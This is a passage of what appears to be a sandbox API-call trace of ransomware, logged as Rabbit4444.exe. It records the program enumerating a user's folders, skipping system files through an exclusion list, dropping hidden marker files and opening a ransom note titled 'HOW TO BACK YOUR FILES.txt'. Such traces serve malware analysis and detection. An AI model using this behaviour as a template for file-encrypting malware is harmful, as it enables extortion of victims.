cAlternateFileName="INETHI~1")) returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0061.414] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0061.414] lstrcpyW (in: lpString1=0x130ebd0, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0061.414] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0061.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0061.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123f70 [0061.415] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122228 [0061.415] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc6b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac756bf, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0061.415] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0061.415] lstrcpyW (in: lpString1=0x130ebd0, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0061.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0061.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x117ec8 [0061.415] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122308 [0061.415] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc6b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfac756bf, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0061.415] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0061.415] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.416] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.416] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.416] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.416] CloseHandle (hObject=0x2a0) returned 1 [0061.416] CloseHandle (hObject=0x27c) returned 1 [0061.416] GetCurrentThreadId () returned 0xd98 [0061.416] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0061.416] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp" [0061.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ec8 | out: hHeap=0xe0000) returned 1 [0061.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0061.417] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp" [0061.417] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\" [0061.417] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0061.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.418] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.421] FlushFileBuffers (hFile=0x27c) returned 1 [0061.421] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.422] CloseHandle (hObject=0x27c) returned 1 [0061.422] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp") returned 80 [0061.422] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.422] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc6b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedee0234, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0061.422] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.422] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.422] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.422] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.422] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc6b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedee0234, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.422] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.422] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.422] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.422] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.423] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.423] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedee0234, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedee0234, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedee0234, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.423] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.423] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.423] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedee0234, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedee0234, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedee0234, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.423] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0061.423] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.423] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.424] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.424] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.424] CloseHandle (hObject=0x2a0) returned 1 [0061.424] CloseHandle (hObject=0x27c) returned 1 [0061.424] GetCurrentThreadId () returned 0xd98 [0061.424] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0061.424] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory" [0061.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123f70 | out: hHeap=0xe0000) returned 1 [0061.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0061.424] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory" [0061.424] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\" [0061.424] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0061.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.429] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.433] FlushFileBuffers (hFile=0x27c) returned 1 [0061.434] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.435] CloseHandle (hObject=0x27c) returned 1 [0061.435] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory") returned 87 [0061.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.435] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc080, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedf06611, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0061.435] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.435] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.435] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.435] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.435] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fc080, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedf06611, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.435] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.435] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.435] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.436] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf06611, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf06611, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf06611, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.436] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedf06611, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedf06611, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedf06611, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.436] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0061.436] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.437] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.437] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.437] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.437] CloseHandle (hObject=0x2a0) returned 1 [0061.437] CloseHandle (hObject=0x27c) returned 1 [0061.437] GetCurrentThreadId () returned 0xd98 [0061.437] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0061.437] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies" [0061.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123bd8 | out: hHeap=0xe0000) returned 1 [0061.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0061.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies" [0061.437] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\" [0061.438] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0061.438] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.439] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.441] FlushFileBuffers (hFile=0x27c) returned 1 [0061.442] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.442] CloseHandle (hObject=0x27c) returned 1 [0061.443] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies") returned 87 [0061.443] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.443] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fb785, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedf06611, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0061.443] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.443] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.443] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.443] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.443] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfac756bf, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd24fb785, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedf06611, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.443] lstrcmpiW (lpString1="..", 